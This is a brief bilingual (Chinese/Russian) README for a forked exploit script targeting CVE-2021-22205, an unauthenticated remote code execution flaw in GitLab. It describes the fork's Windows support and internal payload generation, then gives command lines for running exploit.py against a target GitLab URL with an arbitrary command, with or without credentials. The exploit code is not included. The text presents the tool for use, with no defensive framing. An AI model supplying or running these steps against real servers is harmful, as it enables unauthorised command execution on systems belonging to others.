
CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用
Форк от mr-r3bot/Gitlab-CVE-2021-22205
CVE-2021-22205: EXP для неавторизованного удаленного выполнения кода в Gitlab
Удалена зависимость от djvumake и djvulibre, полезная нагрузка генерируется непосредственно внутри, может выполняться на платформе Windows.
# 需要授权
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# 未授权
python3 exploit.py -t <gitlab_url> -c <command>